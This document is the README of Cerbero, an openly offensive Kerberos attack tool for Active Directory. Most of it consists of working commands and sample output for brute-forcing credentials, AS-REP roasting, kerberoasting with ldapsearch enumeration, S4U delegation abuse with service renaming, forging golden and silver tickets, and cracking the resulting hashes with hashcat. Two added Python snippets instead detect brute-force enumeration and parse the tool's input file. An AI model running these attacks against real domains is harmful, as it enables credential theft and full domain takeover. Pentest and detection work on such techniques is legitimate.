Cerbero

Kerberos protocol attacker. A tool to perform several tasks related to the Kerberos protocol in an Active Directory pentest.

Installation

From crates:

cargo install cerbero

From repo:

git clone https://gitlab.com/Zer1t0/cerbero.git
cd cerbero/
cargo install --path .

Commands

Ask

The ask command retrieves Kerberos tickets (TGT/TGS) from the KDC (the Domain Controller in an Active Directory environment). It can also request tickets through the S4U2Self and S4U2Proxy Kerberos extensions.

TGT

Ask TGT:

$ cerbero ask -vv -u contoso.local/anakin -p Vader1234!
INFO - Request contoso.local/anakin TGT for contoso.local
INFO - Save contoso.local/anakin TGT for contoso.local in anakin.ccache

TGS

Ask TGS:

$ cerbero ask -vv -u contoso.local/anakin -p Vader1234! -s ldap/dc01
INFO - Get contoso.local/anakin TGT for contoso.local from anakin.ccache
INFO - Request contoso.local/anakin TGS for ldap/dc01
INFO - Save contoso.local/anakin TGS for ldap/dc01 in anakin.ccache

Inter-realm TGS:

$ cerbero ask -vv -u contoso.local/anakin -p Vader1234! -s ldap/dc01.poke.mon

S4U2self

Perform S4u2self:

$ cerbero ask -vv -u contoso.local/anakin -p Vader1234! -i han
WARN - No contoso.local/anakin TGT for contoso.local found in anakin.ccache: No TGT found for 'anakin
INFO - Request contoso.local/anakin TGT for contoso.local
INFO - Save contoso.local/anakin TGT for contoso.local in anakin.ccache
INFO - Request contoso.local/han S4U2Self TGS for contoso.local/anakin
INFO - Save contoso.local/han S4U2Self TGS for contoso.local/anakin in anakin.ccache

Inter-realm S4U2proxy:

$ cerbero ask -vv -u contoso.local/anakin -p Vader1234! -i poke.mon/pikachu

Perform S4u2self for a given service of the user:

$ cerbero ask -vv -u contoso.local/anakin -p Vader1234! -i han --user-service service/anakin
INFO - Get contoso.local/anakin TGT for contoso.local from anakin.ccache
INFO - Request contoso.local/han S4U2Self TGS for service/anakin
INFO - Save contoso.local/han S4U2Self TGS for service/anakin in anakin.ccache

S4U2proxy

Perform S4u2proxy:

$ cerbero ask -vv -u contoso.local/anakin -p Vader1234! -i han -s service2/leia
WARN - No contoso.local/anakin TGT for contoso.local found in anakin.ccache: No TGT found for 'anakin
INFO - Request contoso.local/anakin TGT for contoso.local
INFO - Save contoso.local/anakin TGT for contoso.local in anakin.ccache
WARN - No contoso.local/han S4U2Self TGS for contoso.local/anakin found
INFO - Request contoso.local/han S4U2Self TGS for contoso.local/anakin
INFO - Save contoso.local/han S4U2Self TGS for contoso.local/anakin in anakin.ccache
INFO - Request contoso.local/han S4U2Proxy TGS for service2/leia
INFO - Save contoso.local/han S4U2proxy TGS for service2/leia in anakin.ccache

Inter-realm S4U2Proxy:

$ cerbero ask -vv -u contoso.local/anakin -p Vader1234! -i han -s service/pikachu.poke.mon

You can also perform s4u2proxy by changing the target service in the final TGS for the user:

$ cerbero ask -vv -u contoso.local/anakin -p Vader1234! -i han -s HTTP/dc01 --rename-service ldap/dc01
WARN - No contoso.local/anakin TGT for contoso.local found in anakin.ccache: No TGT found for 'anakin
INFO - Request contoso.local/anakin TGT for contoso.local
INFO - Save contoso.local/anakin TGT for contoso.local in anakin.ccache
WARN - No contoso.local/han S4U2Self TGS for service/anakin found
INFO - Request contoso.local/han S4U2Self TGS for contoso.local/anakin
INFO - Save contoso.local/han S4U2Self TGS for contoso.local/anakin in anakin.ccache
INFO - Request contoso.local/han S4U2Proxy TGS for HTTP/dc01
INFO - Received contoso.local/han S4U2proxy TGS for HTTP/dc01
INFO - Rename service from HTTP/dc01 to ldap/dc01
INFO - Save contoso.local/han S4U2proxy TGS for ldap/dc01 in anakin.ccache

AsRepRoast

asreproast can be used to discover users that do not require pre-authentication and retrieve a ticket to crack with hashcat or john.

Check many users:

cerbero asreproast under.world users.txt

Check many users with weak RC4 cipher (easier to crack):

cerbero asreproast under.world users.txt --cipher rc4

Brute

brute performs TGT requests in order to discover user credentials based on the KDC response. This brute-force technique allows you to discover:

  • Valid username/password pairs
  • Valid usernames
  • Expired passwords
  • Blocked or disabled users

This attack should be performed carefully, since many incorrect authentication attempts for the same user can lock that user's account.

Test many users and passwords:

cerbero brute under.world users.txt passwords.txt

Test one user and many passwords:

cerbero brute under.world Zeus passwords.txt

Test many users and one password:

cerbero brute under.world users.txt Olympus1234

Test one user and one password:

cerbero brute under.world Zeus Olympus1234
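A detection-side counterpart to the four outcomes listed above, as an added Python example that is not part of cerbero: the KDC error codes behind those outcomes are the same ones a domain controller records in its 4768/4771 audit events, so one source address collecting failures for many distinct user names is what this technique looks like in the logs. The log lines and their key=value layout are constructed for the example.

```python
from collections import defaultdict

# Kerberos error codes (RFC 4120 section 7.5.9) as they appear in the Windows
# 4768/4771 "Result Code" / "Failure Code" fields, mapped to the outcome that
# the brute technique infers from the KDC's answer.
KDC_CODES = {
    0x0: "valid credentials",
    0x6: "unknown user",           # KDC_ERR_C_PRINCIPAL_UNKNOWN
    0x12: "disabled or locked",    # KDC_ERR_CLIENT_REVOKED
    0x17: "password expired",      # KDC_ERR_KEY_EXPIRED (user and password valid)
    0x18: "wrong password",        # KDC_ERR_PREAUTH_FAILED (user valid)
}

# Constructed sample events (not real logs); the flattened key=value layout
# is a hypothetical form a SIEM might emit for the 4768 fields.
SAMPLE_LOGS = """\
event=4768 user=alice src=10.0.0.5 code=0x6
event=4768 user=bob src=10.0.0.5 code=0x18
event=4768 user=carol src=10.0.0.5 code=0x18
event=4768 user=dave src=10.0.0.5 code=0x12
event=4768 user=erin src=10.0.0.5 code=0x17
event=4768 user=frank src=10.0.0.5 code=0x0
event=4768 user=alice src=10.0.0.9 code=0x18
event=4768 user=alice src=10.0.0.9 code=0x0
""".splitlines()

def classify(code: int) -> str:
    return KDC_CODES.get(code, "other")

def parse_line(line: str):
    fields = dict(kv.split("=", 1) for kv in line.split())
    return fields["user"], fields["src"], int(fields["code"], 16)

def detect_enumeration(lines, user_threshold: int = 4) -> dict:
    """Per source address, count distinct users that drew a non-success KDC reply.
    A single source probing many different principals is the footprint of the
    user/password discovery described above; only sources over threshold are returned."""
    failed_users = defaultdict(set)
    outcomes = defaultdict(lambda: defaultdict(int))
    for line in lines:
        user, src, code = parse_line(line)
        outcomes[src][classify(code)] += 1
        if code != 0:
            failed_users[src].add(user)
    return {
        src: {"users": len(users), "outcomes": dict(outcomes[src])}
        for src, users in failed_users.items()
        if len(users) >= user_threshold
    }
```

A user failing repeatedly from one address is ordinary; the signal here is the breadth of distinct principals per source, which also stays visible when the attacker keeps each user below the lockout threshold.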

Convert

convert converts ticket files between the krb (Windows) and ccache (Linux) formats.

Convert ccache to krb:

$ cerbero convert -i anakin.ccache -o anakin.krb -vv
INFO - Read anakin.ccache with ccache format
INFO - Detected krb format from output file extension
INFO - Save anakin.krb with krb format

Convert krb to ccache:

$ cerbero convert -i anakin.krb -o anakin.ccache -vv
INFO - Read anakin.krb with krb format
INFO - Detected ccache format from output file extension
INFO - Save anakin.ccache with ccache format

Craft

craft creates golden and silver tickets.

Craft a golden ticket (by using the krbtgt AES256 key):

$ cerbero craft -u under.world/kratos --sid S-1-5-21-658410550-3858838999-180593761 --aes fed0c966ff7f88d776bb35fed0f039725f8bbb87017d5b6b76ee848f25562d2c -vv
INFO - Save kratos TGT in kratos.ccache

Craft a silver ticket (for the service cifs hosted by the machine styx):

$ cerbero craft -u under.world/kratos --sid S-1-5-21-658410550-3858838999-180593761 --ntlm 29f9ab984728cc7d18c8497c9ee76c77 -s cifs/styx.under.world -vv
INFO - Save kratos TGS for cifs/styx.under.world in kratos.ccache

Hash

Calculate the Kerberos keys (password hashes) from the user password.

Calculate RC4 key (NT hash):

$ cerbero hash 'IamtheKingofD34d!!'
rc4:86e0a04f7a44ed4d4a7eaf2ee977c799

Calculate all the keys:

$ cerbero hash 'IamtheKingofD34d!!' -u under.world/Hades
rc4:86e0a04f7a44ed4d4a7eaf2ee977c799
aes128:fe165dec904772a90a177069e4ea7019
aes256:1304965c35176aeb72e1ae5fdd6c2fe2e901af7223cb75f5eaac25ad667136e7

Kerberoast

kerberoast formats the encrypted part of service tickets so that they can be cracked with hashcat or john.

You need to provide a file with the user services. Each line of the file must have one of the following formats:

  • user
  • domain/user
  • user:spn
  • domain/user:spn

When no service SPN is specified, an NT-ENTERPRISE principal is used instead. This can also be useful to brute-force which users have services.

An example file is the following:

sara
jack:HTTP/webserver
cake.com/john
cake.com/peter:HTTP/peter-pc

By using that file you could obtain a result like the following:

$ cerbero kerberoast -u contoso.local/jaime -p Jama1234! -s /tmp/users.txt | tee /tmp/hashes.txt
$krb5tgs$23$*sara$CONTOSO.LOCAL$sara@contoso.local*$637b06b244ad69bf30d9b0a956c6143....5f69271
$krb5tgs$23$*jack$CONTOSO.LOCAL$HTTP/webserver*$8723987493798178273879856c6....ab78677
$krb5tgs$23$*john$CAKE.COM$john@CAKE.COM*$87687619876bde9879879879....1111111
$krb5tgs$23$*peter$CAKE.COM$HTTP/peter-pc*$2c77d95792f1393d3f25aec157823....4f6085f
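A parser for the user-services file format described above, as an added Python example rather than cerbero's own code: it resolves the four line forms to the realm, account and service name that will be requested, substituting the NT-ENTERPRISE name user@REALM when no SPN is given (the same form that appears in the output above, e.g. sara@contoso.local). Upper-casing the realm is a convention of this example, and the default realm is assumed to be the one from the -u user.

```python
import re

# One line of the user-services file: [domain/]user[:spn]
_LINE = re.compile(r"^(?:(?P<realm>[^/:]+)/)?(?P<user>[^/:]+)(?::(?P<spn>.+))?$")

NT_ENTERPRISE = 10  # name type of "user@REALM" principals (RFC 6806)

# Constructed copy of the example file above.
SAMPLE_FILE = """\
sara
jack:HTTP/webserver
cake.com/john
cake.com/peter:HTTP/peter-pc
"""

def parse_service_line(line: str, default_realm: str) -> dict:
    """Resolve one line to the realm, account and service name that gets requested.
    Without an SPN the enterprise name user@REALM is used (name type NT-ENTERPRISE)."""
    m = _LINE.match(line.strip())
    if not m:
        raise ValueError(f"unrecognised line: {line!r}")
    realm = (m["realm"] or default_realm).upper()   # upper-casing is this example's convention
    user = m["user"]
    if m["spn"]:
        return {"realm": realm, "user": user, "sname": m["spn"], "enterprise": False}
    return {"realm": realm, "user": user, "sname": f"{user}@{realm}", "enterprise": True}

def parse_services_file(text: str, default_realm: str) -> list:
    """Parse the whole file; blank lines and '#' comments are skipped (a convention added here)."""
    return [parse_service_line(line, default_realm)
            for line in text.splitlines()
            if line.strip() and not line.lstrip().startswith("#")]
```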

To get a list of users with services you can use ldapsearch:

$ ldapsearch -h 192.168.100.2 -b "dc=contoso,dc=local" -w Vader1234!  -D "[email protected]" "(&(samAccountType=805306368)(servicePrincipalName=*)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))" samaccountname | grep -i samaccountname: | cut -d ' ' -f 2 | tee users.txt
anakin
leia

The tickets could be cracked by using the following hashcat command:

$ hashcat -m 13100 /tmp/hashes.txt wordlist.txt

List

list displays information about credential files (ccache/krb) or keytabs, similar to the klist command.

Show the credentials information of a ccache file:

$ cerbero list hades.ccache
Ticket cache (ccache): FILE:hades.ccache

[email protected] => krbtgt/[email protected]
Valid starting: 01/12/2021 12:08:09
Expires: 01/12/2021 22:08:09
Renew until: 01/19/2021 12:08:09
Flags: 0x40e10000 -> forwardable renewable initial pre_authent name_canonicalize
Etype (skey, tkt): 18 -> aes256-cts-hmac-sha1-96, 18 -> aes256-cts-hmac-sha1-96

Show the keys of a keytab file:

$ cerbero list user.keytab
Keytab: user.keytab

[email protected]
Name type: 1 -> nt-principal
Key: 8846f7eaee8fb117ad06bdd830b7586c
Key type: 23 -> rc4-hmac
Time: 01/17/2021 16:26:23
Version: 1

If no file is provided, it looks for the default credential file set in the KRB5CCNAME environment variable. If the -K option is given instead, it shows the keytab file specified in the KRB5_KTNAME environment variable.

Credits

This work is based on the great work of other people:
